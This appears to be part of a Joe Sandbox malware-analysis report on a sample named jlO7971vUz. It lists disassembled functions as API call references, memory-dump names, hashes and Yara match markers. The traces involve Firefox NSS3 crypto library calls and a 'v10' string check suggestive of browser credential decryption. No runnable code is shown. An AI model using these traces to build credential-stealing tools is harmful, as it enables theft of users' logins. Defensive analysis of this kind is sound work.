Part of subcall function 6C59ADC0: EnterCriticalSection.KERNEL32(?,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AE24
Part of subcall function 6C59ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C57D079,00000000,00000001), ref: 6C59AE5A
Part of subcall function 6C59ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AE6F
Part of subcall function 6C59ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AE7F
Part of subcall function 6C59ADC0: TlsGetValue.KERNEL32(?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AEB1
Part of subcall function 6C59ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AEC9

PK11_FreeSymKey.NSS3(?,@]^l,00000000,?,?,6C5D6AC6,?), ref: 6C5FAC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]^l,00000000,?,?,6C5D6AC6,?), ref: 6C5FAC59
free.MOZGLUE(8CB6FF01,6C5D6AC6,?,?,?,?,?,?,?,?,?,?,6C5E5D40,00000000,?,6C5EAAD4), ref: 6C5FAC62

Strings

@]^l, xrefs: 6C5FAC05

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: @]^l
API String ID: 1595327144-3188221803
Opcode ID: c18d10599beb12f62222f1b62de1b3fd5923f0497dedf1d02a17cb1344afcd10
Instruction ID: 3094c879a38df775b07b8fe32634c08b5b97c2962e225b5e9a34f122f7d6568e
Opcode Fuzzy Hash: c18d10599beb12f62222f1b62de1b3fd5923f0497dedf1d02a17cb1344afcd10
Instruction Fuzzy Hash: A30128B5A002009FEB04DF55ECD0B5677A8AB54B58F1880A8E9598F706D731EC49CBA2

Function 6C4D2940 Relevance: 7.8, APIs: 6, Instructions: 327stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C4D1360,00000000), ref: 6C4D2A19
memcpy.VCRUNTIME140(?,00000009,00000034,?,?,?,6C4D1360,00000000), ref: 6C4D2A45
memcpy.VCRUNTIME140(?,00000000,00000000), ref: 6C4D2A7C

Part of subcall function 6C4D2D50: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,5C13B8AF,?,?,00000000,?,6C4D296E), ref: 6C4D2DA4

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D2AF3
memcpy.VCRUNTIME140(?,00000009,0000000C,?,?,?,6C4D1360,00000000), ref: 6C4D2B71
memset.VCRUNTIME140(00000000,00000000,00000034), ref: 6C4D2B90

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: memcpystrlen$memset
String ID:
API String ID: 638109778-0
Opcode ID: 13ed774dfbfd50b6a0e3f8dad88cf721e77ecaf562a00b56fbeb90076a92b4d9
Instruction ID: 229ded74cfc4dc0b664281056ae6240fba52ac004a1b4bf830e5ed0ee87ee195
Opcode Fuzzy Hash: 13ed774dfbfd50b6a0e3f8dad88cf721e77ecaf562a00b56fbeb90076a92b4d9
Instruction Fuzzy Hash: 82C1B471F002068BEB14DF65C8A4FAAB7A5BF89304F164269D9199B741DB30EC42CBD1

Function 6C4EA910 Relevance: 7.7, APIs: 5, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab846c6550b6cbcc5dec6f5bbe6606ef5038ce603388b472b4086259d29a3b27
Instruction ID: 370552370c8783efd5705c1dee3d52b761121c07a4608d55d024e58341c78223
Opcode Fuzzy Hash: ab846c6550b6cbcc5dec6f5bbe6606ef5038ce603388b472b4086259d29a3b27
Instruction Fuzzy Hash: E891D3317002049FEB18DF66E8D9F6A3BB5BF4A30AF06042DD64747B40DB34A965CB99

Function 017F00D0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 017F00F8
strtok_s.MSVCRT ref: 017F023D

Part of subcall function 017F8640: lstrlen.KERNEL32(00000000,?,?,017F3D93,017FE4BB,017FE4BA,?,?,017F4A46,00000000,?,013B09B8,?,017FE988,?,00000000), ref: 017F864B
Part of subcall function 017F8640: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F86A5

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: be7888b903dd65b7b20b5e1f0c1b4f45d1e32085193f8d9afa1b20d19b0d577c
Instruction ID: 13c7ffc9bb3ef67f93b4ef4679d301af2d90cb774cb69684129f5fad9e3bb741
Opcode Fuzzy Hash: be7888b903dd65b7b20b5e1f0c1b4f45d1e32085193f8d9afa1b20d19b0d577c
Instruction Fuzzy Hash: 30514BB8A4410AEFCB08CF54D595AAFB7B6FF54308F10809DE902AB355D730EA51CBA1

Function 017E9800 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 017E981B
memset.MSVCRT ref: 017E984E
LocalAlloc.KERNEL32(00000040,?), ref: 017E989E

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F8640: lstrlen.KERNEL32(00000000,?,?,017F3D93,017FE4BB,017FE4BA,?,?,017F4A46,00000000,?,013B09B8,?,017FE988,?,00000000), ref: 017F864B
Part of subcall function 017F8640: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F86A5

Part of subcall function 017F85C0: lstrcpy.KERNEL32(?,00000000), ref: 017F8606

Strings

@, xrefs: 017E9857
v10, xrefs: 017E9812

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
String ID: @$v10
API String ID: 1400469952-24753345
Opcode ID: 0c0e6a5d80ea80b0ea30c5be5ecdb568a625468bf0c5e1057b2a928162dd8401
Instruction ID: 7ae61e0ec9c318a349d5afb6550373764bea50bd15e5ab9ef1670d8aa90568ca
Opcode Fuzzy Hash: 0c0e6a5d80ea80b0ea30c5be5ecdb568a625468bf0c5e1057b2a928162dd8401
Instruction Fuzzy Hash: 3A41FB7190020DEFDB14DFA9D899BEEB7B5BF44704F00811CF6056B298DB70AA45CB91

Function 6C54EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C54EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C54EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C54EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C54EEEB
free.MOZGLUE(?), ref: 6C54EEF6

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 38b67746adfc540b5940dd643ec6d7456c2721c211e8afd6c743b3af7901ca24
Instruction ID: e014a2219cd8cc5df529137e00d8d3b96c91a489b72dbc64f504c8dc9012952e
Opcode Fuzzy Hash: 38b67746adfc540b5940dd643ec6d7456c2721c211e8afd6c743b3af7901ca24
Instruction Fuzzy Hash: E0310971600201ABD720DF29CC84F66BBF4FB46304F144929E95A87B51E771E824CBE5

Function 6C55AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C553FFF,00000000,?,?,?,?,?,6C551A1C,00000000,00000000), ref: 6C55ADA7

Part of subcall function 6C5B14C0: TlsGetValue.KERNEL32 ref: 6C5B14E0
Part of subcall function 6C5B14C0: EnterCriticalSection.KERNEL32 ref: 6C5B14F5
Part of subcall function 6C5B14C0: PR_Unlock.NSS3 ref: 6C5B150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C553FFF,00000000,?,?,?,?,?,6C551A1C,00000000,00000000), ref: 6C55ADB4

Part of subcall function 6C5B10C0: TlsGetValue.KERNEL32(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B10F3
Part of subcall function 6C5B10C0: EnterCriticalSection.KERNEL32(?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B110C
Part of subcall function 6C5B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B1141
Part of subcall function 6C5B10C0: PR_Unlock.NSS3(?,?,?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B1182
Part of subcall function 6C5B10C0: TlsGetValue.KERNEL32(?,6C558802,00000000,00000008,?,6C54EF74,00000000), ref: 6C5B119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C553FFF,?,?,?,?,6C553FFF,00000000,?,?,?,?,?,6C551A1C,00000000), ref: 6C55ADD5

Part of subcall function 6C5AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C5A8D2D,?,00000000,?), ref: 6C5AFB85
Part of subcall function 6C5AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C5AFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C6794B0,?,?,?,?,?,?,?,?,6C553FFF,00000000,?), ref: 6C55ADEC

Part of subcall function 6C5AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6818D0,?), ref: 6C5AB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C553FFF), ref: 6C55AE3C

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: eb2183b0f9c983e47c91fbf4ea7552ccc95c88077ea97c785a15f0113929f13c
Instruction ID: d104ec1f1f94b024079b5487912a10c8c188dc7a002ac73374dd1e180ebcf6f6
Opcode Fuzzy Hash: eb2183b0f9c983e47c91fbf4ea7552ccc95c88077ea97c785a15f0113929f13c
Instruction Fuzzy Hash: 08115671E003089BE7109B659C40BBF77B8DF9124DF40462AEC1996741FB20F96886F2

Function 6C5A8800 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C5B085A,00000000,?,6C558369,?), ref: 6C5A8821
TlsGetValue.KERNEL32(?,?,6C5B085A,00000000,?,6C558369,?), ref: 6C5A883D
EnterCriticalSection.KERNEL32(?,?,?,6C5B085A,00000000,?,6C558369,?), ref: 6C5A8856
PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C5A8887
PR_Unlock.NSS3(?,?,?,?,6C5B085A,00000000,?,6C558369,?), ref: 6C5A8899

Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407AD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407CD
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4D204A), ref: 6C5407D6
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4D204A), ref: 6C5407E4
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,6C4D204A), ref: 6C540864
Part of subcall function 6C5407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C540880
Part of subcall function 6C5407A0: TlsSetValue.KERNEL32(00000000,?,?,6C4D204A), ref: 6C5408CB
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408D7
Part of subcall function 6C5407A0: TlsGetValue.KERNEL32(?,?,6C4D204A), ref: 6C5408FB

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID:
API String ID: 2759447159-0
Opcode ID: 16e94d6830eea0710a6c2c3c52cb463d3a8db5ac989cf6f6f80fbe4c05565856
Instruction ID: aa61d43e8b0ba3768fc69bdef01e19db2081d3127ff1c995b05b9928908c9dc2
Opcode Fuzzy Hash: 16e94d6830eea0710a6c2c3c52cb463d3a8db5ac989cf6f6f80fbe4c05565856
Instruction Fuzzy Hash: 26217AB4904646DBCB00EFBAC88416EBBF0BF45348F104A66D89497605EB30E896CB93

Function 017F4850 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(017FE988,?,?,017F4A41,00000000,?,013B09B8,?,017FE988,?,00000000,?), ref: 017F489C
sscanf.NTDLL ref: 017F48C9
SystemTimeToFileTime.KERNEL32(017FE988,00000000,?,?,?,?,?,?,?,?,?,?,?,013B09B8,?,017FE988), ref: 017F48E2
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,013B09B8,?,017FE988), ref: 017F48F0
ExitProcess.KERNEL32 ref: 017F490A

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 839b635e2dc8b5b3ba70d29b14461fbdb7b35d071251f0f25a2ba6bf85c7bf85
Instruction ID: 86f60f97d60ad739ddcf259c3208641004929076a96737d2e856a2bb187f7f7b
Opcode Fuzzy Hash: 839b635e2dc8b5b3ba70d29b14461fbdb7b35d071251f0f25a2ba6bf85c7bf85
Instruction Fuzzy Hash: A221EA75D10209ABCF04DFE8E9499EFB7B9BF48300F04852EE516A3244EB345605CB69

Function 6C5728A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C5680DD), ref: 6C5728BA
EnterCriticalSection.KERNEL32(?,?,?,?,6C5680DD), ref: 6C5728D3
PR_Unlock.NSS3(?,?,?,?,?,6C5680DD), ref: 6C5728E8
DeleteCriticalSection.KERNEL32(?,?,?,?,?,6C5680DD), ref: 6C57290E
free.MOZGLUE(?,?,?,?,?,?,6C5680DD), ref: 6C57291A

Part of subcall function 6C569270: DeleteCriticalSection.KERNEL32(?,?,6C575089,?,6C573B70,?,?,?,?,?,6C575089,6C56F39B,00000000), ref: 6C56927F
Part of subcall function 6C569270: free.MOZGLUE(?,?,6C573B70,?,?,?,?,?,6C575089,6C56F39B,00000000), ref: 6C569286
Part of subcall function 6C569270: PL_HashTableDestroy.NSS3(?,6C573B70,?,?,?,?,?,6C575089,6C56F39B,00000000), ref: 6C569292

Part of subcall function 6C568B50: TlsGetValue.KERNEL32(00000000,?,6C570948,00000000), ref: 6C568B6B
Part of subcall function 6C568B50: EnterCriticalSection.KERNEL32(?,?,?,6C570948,00000000), ref: 6C568B80
Part of subcall function 6C568B50: PL_FinishArenaPool.NSS3(?,?,?,?,6C570948,00000000), ref: 6C568B8F
Part of subcall function 6C568B50: PR_Unlock.NSS3(?,?,?,?,6C570948,00000000), ref: 6C568BA1
Part of subcall function 6C568B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6C570948,00000000), ref: 6C568BAC
Part of subcall function 6C568B50: free.MOZGLUE(?,?,?,?,?,6C570948,00000000), ref: 6C568BB8

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
String ID:
API String ID: 3225375108-0
Opcode ID: 10fb8673fb970ace1111b7d9f27741ea34420366ceb4d2f2d62510ee27723f98
Instruction ID: fdf1b980784f4588d7b5619c147a9d51f19e53f01a6bb7e0d6f72bdce9a48f0a
Opcode Fuzzy Hash: 10fb8673fb970ace1111b7d9f27741ea34420366ceb4d2f2d62510ee27723f98
Instruction Fuzzy Hash: 6B215CB5A04A05DBCB00AF7AC888569BBF0FF45354F054929DC9597B00EB31E8D5CBA2

Function 6C568FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C570710), ref: 6C568FF1
PR_CallOnce.NSS3(6C6B2158,6C569150,00000000,?,?,?,6C569138,?,6C570710), ref: 6C569029
calloc.MOZGLUE(00000001,00000000,?,?,6C570710), ref: 6C56904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C570710), ref: 6C569066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C570710), ref: 6C569078

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: 0ec8ebf3e88073282c696a3ec81606ab7c978964141c47ace37dd979c959cb9f
Instruction ID: 88ca208431b026e56bd82f838ed1026003c6220e846f6bd8856c950a1f66fa81
Opcode Fuzzy Hash: 0ec8ebf3e88073282c696a3ec81606ab7c978964141c47ace37dd979c959cb9f
Instruction Fuzzy Hash: 3311257170011157EB1057AFAC44A6676ACDB827BCF100521FD84C6F51F752CD5583A9

Function 6C57CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C591E10: TlsGetValue.KERNEL32 ref: 6C591E36
Part of subcall function 6C591E10: EnterCriticalSection.KERNEL32(?,?,?,6C56B1EE,2404110F,?,?), ref: 6C591E4B
Part of subcall function 6C591E10: PR_Unlock.NSS3 ref: 6C591E76

free.MOZGLUE(?,6C57D079,00000000,00000001), ref: 6C57CDA5
PK11_FreeSymKey.NSS3(?,6C57D079,00000000,00000001), ref: 6C57CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C57D079,00000000,00000001), ref: 6C57CDCF
DeleteCriticalSection.KERNEL32(?,6C57D079,00000000,00000001), ref: 6C57CDE2
free.MOZGLUE(?), ref: 6C57CDE9

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: a500942639b5387f204146909439f3c688b436c8946969a2ef2b5ebd6e283fee
Instruction ID: b39921da0342d28eb65725f3b8b43887344afe65cee71499b3b5b724e082a2f7
Opcode Fuzzy Hash: a500942639b5387f204146909439f3c688b436c8946969a2ef2b5ebd6e283fee
Instruction Fuzzy Hash: 1911C2B2B01151BBDB10AFA5ED84E9AB77CFF44258B144121EA0987E01E732F8A4C7F1

Function 6C5E2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C5E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C5E5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5E2CEC

Part of subcall function 6C5FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5FC2BF

PR_EnterMonitor.NSS3(?), ref: 6C5E2D02
PR_EnterMonitor.NSS3(?), ref: 6C5E2D1F
PR_ExitMonitor.NSS3(?), ref: 6C5E2D42
PR_ExitMonitor.NSS3(?), ref: 6C5E2D5B

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

